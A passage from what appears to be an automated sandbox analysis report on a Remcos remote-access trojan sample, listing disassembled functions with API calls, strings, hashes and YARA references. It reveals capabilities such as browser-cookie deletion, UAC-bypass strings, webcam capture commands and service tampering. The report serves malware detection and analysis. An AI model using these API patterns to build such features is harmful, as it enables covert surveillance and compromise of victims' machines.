                                                        • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                        • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                        Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                          • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32 ref: 00413622
                                                          • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                        • API String ID: 1133728706-4073444585
                                                        • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                        • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                        • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                        • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                        Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                        • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                        • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                        • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                        Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                        Strings
                                                        • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                        • String ID: http://geoplugin.net/json.gp
                                                        • API String ID: 3121278467-91888290
                                                        • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                        • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                        • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                        • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                        Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                        • _free.LIBCMT ref: 00450FC8
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00450FD3
                                                        • _free.LIBCMT ref: 00450FDE
                                                        • _free.LIBCMT ref: 00451032
                                                        • _free.LIBCMT ref: 0045103D
                                                        • _free.LIBCMT ref: 00451048
                                                        • _free.LIBCMT ref: 00451053
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                        Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                        • int.LIBCPMT ref: 004111BE
                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                        • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                        • String ID: (mG
                                                        • API String ID: 2536120697-4059303827
                                                        • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                        • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                        • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                        • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                        Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                          • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                          • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32 ref: 00413622
                                                          • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 1866151309-2070987746
                                                        • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                        • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                        • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                        • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                        Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                        • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                        • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                        • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                        Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                          • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                          • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                        • CoUninitialize.OLE32 ref: 00407664
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                        • API String ID: 3851391207-1839356972
                                                        • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                        • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                        • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                        • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                        Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                        • GetLastError.KERNEL32 ref: 0040BB22
                                                        Strings
                                                        • [Chrome Cookies not found], xrefs: 0040BB3C
                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                        • UserProfile, xrefs: 0040BAE8
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                        • API String ID: 2018770650-304995407
                                                        • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                        • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                        • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                        • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                        Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocConsole.KERNEL32 ref: 0041CE35
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AllocOutputShowWindow
                                                        • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                        • API String ID: 2425139147-3820604032
                                                        • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                        • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                        • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                        • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                        Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 0044340D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                        • API String ID: 4061214504-213444651
                                                        • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                        • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                        • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                        • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                        Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __allrem.LIBCMT ref: 0043ACE9
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                        • __allrem.LIBCMT ref: 0043AD1C
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                        • __allrem.LIBCMT ref: 0043AD51
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                        • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                        • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                        • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: H_prologSleep
                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                        • API String ID: 3469354165-3054508432
                                                        • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                        • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                        • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                        • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                        Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                        • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                          • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                          • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                          • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                        • String ID:
                                                        • API String ID: 3950776272-0
                                                        • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                        • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                        • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                        • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                        Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                        • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                        • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                        • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                        Function 004475F1 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16_free
                                                        • String ID: a/p$am/pm
                                                        • API String ID: 2936374016-3206640213
                                                        • Opcode ID: 62adf863dc24d00916a3254393e17002c998b579a7dab235e83bdb4bfc0b0ed7
                                                        • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                        • Opcode Fuzzy Hash: 62adf863dc24d00916a3254393e17002c998b579a7dab235e83bdb4bfc0b0ed7
                                                        • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                        Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                        • String ID:
                                                        • API String ID: 493672254-0
                                                        • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                        • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                        • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                        • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                        Function 0044A084 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID: PkGNG
                                                        • API String ID: 1036877536-263838557
                                                        • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                        • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                        • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                        • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                        Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • _free.LIBCMT ref: 004482CC
                                                        • _free.LIBCMT ref: 004482F4
                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • _abort.LIBCMT ref: 00448313
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                        • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                        • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                        • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                        Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                        • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
